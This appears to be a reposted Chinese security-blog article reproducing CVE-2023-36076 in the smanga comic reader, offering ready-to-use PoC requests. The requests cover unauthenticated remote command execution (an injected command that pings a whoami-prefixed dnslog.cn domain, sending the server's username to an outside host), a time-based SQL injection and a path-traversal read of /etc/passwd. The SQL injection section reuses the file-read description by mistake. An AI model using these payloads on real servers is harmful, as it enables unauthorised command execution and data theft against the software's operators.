CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取

admin 2024年8月5日23:37:54评论24 views字数 1328阅读4分25秒阅读模式

本人非原创漏洞作者,文章仅作为知识分享用

如有侵权,联系删除

产品简介

无需配置,docker直装的漫画流媒体阅读工具。以emby plex为灵感,为解决漫画阅读需求而开发的漫画阅读器。在windows环境部署smanga安装环境面板,首先安装小皮面板,下载smanga项目,导入数据库,登录smanga,windows部署smanga。

开发语言:PHPGitHub:https://github.com/lkw199711/smanga

CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取

漏洞描述

/php/manga/delete.php接口处存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。

影响版本

smanga ≤ V3.2.7

空间测绘

回复“CVE-2023-36076”获取空间测绘搜索语句

漏洞利用

POC

POST /php/manga/delete.phpmangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '";ping -c 3 `whoami`.evvj80.dnslog.cn;"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true

1.发生请求

CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取

2.dnslog收到回显

CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取

SQL注入

漏洞描述

/php/get-file-flow.php接口处file参数没有进行过滤,存在路径遍历,造成任意文件读取漏洞,未授权的攻击者可读取配置文件。

影响版本

smanga ≤ V3.2.7

漏洞利用

POC

POST /php/history/add.phpchapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=if(now()=sysdate()%2Csleep(3)%2C0)&timestamp=12123123&userId=1

CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取

任意文件读取

漏洞描述

/php/get-file-flow.php接口处file参数没有进行过滤,存在路径遍历,造成任意文件读取漏洞,未授权的攻击者可读取配置文件。

影响版本

smanga ≤ V3.2.7

漏洞利用

POC

POST /php/get-file-flow.phpfile=../../../../../../../../etc/passwd

CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-36076https://github.com/lkw199711/smanga/issues/100

回复“CVE-2023-36076”获取空间测绘语句

仅供学习交流,勿用作违法犯罪

CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取

原文始发于微信公众号(不够安全):CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月5日23:37:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-36076:smanga漫画阅读系统 远程命令执行 漏洞复现 附POC 附SQL注入和任意文件读取http://cn-sec.com/archives/2013978.html

发表评论

匿名网友 填写信息